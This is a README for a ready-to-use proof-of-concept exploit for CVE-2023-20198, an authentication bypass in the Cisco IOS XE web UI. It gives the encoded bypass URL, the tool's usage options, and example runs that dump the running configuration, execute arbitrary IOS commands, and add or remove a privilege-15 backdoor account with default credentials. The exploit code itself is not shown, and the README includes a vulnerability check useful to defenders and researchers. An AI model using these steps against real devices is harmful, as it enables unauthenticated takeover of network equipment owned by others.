Exploit PoC for CVE-2023-20198

CVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the webui_wsma_http web endpoint without requiring authentication.
By bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges.
Cisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS root user to facilitate implantation.

This PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:
The vulnerability check, config, and command execution options all target the cisco:wsma-exec SOAP endpoint to insert commands into the execCLI element tag.
The add user option targets the cisco:wsma-config SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC.

Abuse of the cisco:wsma-exec SOAP endpoint came from the nuclei template
Abuse of the cisco:wsma-config SOAP endpoint came from the horizon3ai PoC

Note: I did not conduct any of the original research or PoC development for this CVE. See the references section for credit.

usage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]

CVE-2023-20198 Exploit PoC

options:
  -h, --help      show this help message and exit
  -t targetIP     Target IP Address
  -l targetFile   File containing IP Addresses (-c only)
  -https          Use https
  -c              [X] Check for vulnerability
  -g              [X] Get Cisco IOS running config
  -e command      [X] Execute Cisco IOS command
  -a              [X] Add new priv 15 user
  -d              [X] Remove priv 15 user
  -u newUserName  [Optional] user name for -a or -d. Default: shellsmoke
  -p newUserPass  [Optional] new user pass for -a. Default: pwned
  -o outputFile   Write output to file
  -v              Increase verbosity

To check for CVE-2023-20198, -c will attempt to exploit the vulnerability to execute uname -a
Example:

# ./exploit.py -t 10.0.0.1 -c

Testing for vulnerability
Target IP:      10.0.0.1
Target URL:     http://10.0.0.1/%2577eb%2575i_%2577sma_Http
Vulnerable:     True
IOS Ver:        <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)

The -g option executes sh run to pull the running config
Example:

# ./exploit.py -t 10.0.0.1 -g

Building configuration...
Current configuration : 6988 bytes
!
...
!
version 16.6
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
...

Arbitrary Cisco IOS commands can be executed with the -e option.
Extreme caution should be used when using this to make configuration changes. There is no input validation and changes are applied immediately to the running config.
Example:

# ./exploit.py -t 10.0.0.1 -e 'sh log'

Selected Target:        10.0.0.1
Running in Exec Mode
Executing Command:      sh log

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

Syslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)
No Active Message Discriminator.
No Inactive Message Discriminator.
    Console logging: level debugging, 5368 messages logged, xml disabled,
                     filtering disabled
...

The -a option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with -u and -p respectively.
Example:

# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned

Selected Target:        10.0.0.1
Adding New Privilege 15 User
New User Name:  shellsmoke
New User Pass:  pwned

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

No reportable output from adding users
Check verbose ouput or get running config
Done.

The -d option can be used to remove a user account from the device, and respects the username specified with -u.
Caution should be used to make sure you aren't deleting a legitimate account.
This was added for instances where shell/webui access to an exploited Cisco can not be obtained. It was observed that adding a Privilege 15 user does not grant webui access and could lead to leaving exploitation artifacts on hosts.

Cisco Advisory
horizon3ai CVE-2023-20198 research
horizon3ai CVE-2023-20198 PoC
nuclei CVE-2023-20198 template (Authors: iamnoooob, rootxharsh, pdresearch)
LeakIX CVE-2023-20273 PoC

• https support
• CVE-2023-20273 Implementation
• Timeout and error handling

The code contained in this project is intended only for research and usage on systems where the user has explicit authorization.
The author of this project is not responsible or liable for misuse of the software.
Use responsibly and don't be evil